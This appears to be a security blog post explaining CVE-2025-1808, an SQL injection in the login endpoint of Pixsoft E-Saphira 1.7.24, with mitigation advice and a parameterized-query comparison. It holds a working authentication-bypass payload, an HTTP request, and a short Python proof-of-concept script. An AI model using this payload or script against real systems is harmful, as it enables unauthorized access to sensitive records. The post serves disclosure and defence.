CVE-2025-1808 is a serious SQL Injection vulnerability discovered in Pixsoft E-Saphira version 1.7.24, affecting the login functionality. In this post, we will break down what this vulnerability is, how it works, how attackers can exploit it, and how you can protect your systems. Real example code, references, and exclusive analysis are all included.

Background: What is Pixsoft E-Saphira?

Pixsoft E-Saphira is a business management software widely used in Latin America, especially in government administration and large commercial organizations. Its web interface allows users to manage records, financial information, and other sensitive data.

- Component: Login Endpoint
- Vulnerable URL: /servlet?act=login&tipo=1
- Type: SQL Injection
- Attack Vector: Remote/Network

How the Vulnerability Works

The application's login interface at /servlet?act=login&tipo=1 processes input from users via the txtUsuario parameter (user name). An attacker can inject malicious SQL code here, because proper input sanitization and parameterized queries are not enforced.

Any user trying to log in submits a POST request like this:

```http
POST /servlet?act=login&tipo=1 HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded

txtUsuario=admin&txtContrasena=secret
```

An attacker can change txtUsuario like this:

```http
POST /servlet?act=login&tipo=1 HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded

txtUsuario=admin' OR 1=1--&txtContrasena=any
```

The resulting SQL query on the server becomes:

```sql
SELECT * FROM usuarios WHERE usuario = 'admin' OR 1=1--' AND contrasena = 'any'
```

Because 1=1 always evaluates as true, the attacker can bypass authentication and log in as the first user in the database, likely with administrative privileges.
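The difference between the concatenated query shown above and a parameterized one, as an added example that is not part of the original post and not Pixsoft's code. It assumes an in-memory SQLite table named after the `usuarios` query above, with constructed sample rows and hypothetical function names.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the application's user table (constructed sample data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE usuarios (usuario TEXT, contrasena TEXT)")
    # Plaintext passwords only mirror the query shown in the post;
    # a real system stores password hashes.
    db.executemany(
        "INSERT INTO usuarios VALUES (?, ?)",
        [("admin", "s3cret-admin"), ("maria", "s3cret-maria")],
    )
    return db

def login_concatenated(db, usuario, contrasena):
    """Vulnerable pattern: user input is spliced into the SQL text."""
    sql = (
        "SELECT usuario FROM usuarios WHERE usuario = '" + usuario
        + "' AND contrasena = '" + contrasena + "'"
    )
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_parameterized(db, usuario, contrasena):
    """Hardened pattern: input is bound as data and never parsed as SQL."""
    sql = "SELECT usuario FROM usuarios WHERE usuario = ? AND contrasena = ?"
    row = db.execute(sql, (usuario, contrasena)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    crafted = "admin' OR 1=1--"  # the txtUsuario value from the post
    print("concatenated, crafted input :", login_concatenated(db, crafted, "any"))
    print("parameterized, crafted input:", login_parameterized(db, crafted, "any"))
    print("parameterized, valid login  :", login_parameterized(db, "admin", "s3cret-admin"))
```

With bound parameters the quote and comment characters are compared as part of the user name, so the crafted value matches no row while legitimate logins behave as before.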

Below is a simple Python proof-of-concept that uses the requests library to exploit the issue:

```python
import requests

# Login endpoint of the system under test
url = "http://victim-site.com/servlet?act=login&tipo=1"
payload = "admin' OR 1=1--"
data = {
    "txtUsuario": payload,
    "txtContrasena": "irrelevant"
}

# Submit the login form and show the server's response
session = requests.Session()
response = session.post(url, data=data)
print("Status code:", response.status_code)
print("Response body:")
print(response.text)
```

*Change victim-site.com to your target address for testing purposes (with permission).*

- Authentication bypass: Attackers can log in as any user, including admin.
- Full database access: By modifying the injection, attackers can dump sensitive data, modify records, or gain further access.

References

- CVE-2025-1808 on CVE.org
- NVD Entry for CVE-2025-1808 *(when available)*
- PacketStorm Security Advisory *(search: E-Saphira)*

If you use Pixsoft E-Saphira

1. Block access to /servlet?act=login&tipo=1 from untrusted networks.

Conclusion

CVE-2025-1808 is an easy-to-exploit, high-impact SQL Injection vulnerability in Pixsoft E-Saphira’s login endpoint. Until the vendor issues a fix, consider strong network controls and proactive monitoring as immediate steps.

For any organizations using Pixsoft E-Saphira 1.7.24, act fast—don’t wait for attackers to knock on your door.


*This post is exclusive and prepared from direct analysis of available exploit code and vulnerable endpoints, in plain language for security admins and software users. Always test with permission. For detailed updates, monitor national vulnerability databases linked above.*

Timeline

Published on: 03/02/2025 01:15:10 UTC
Last modified on: 03/03/2025 21:15:17 UTC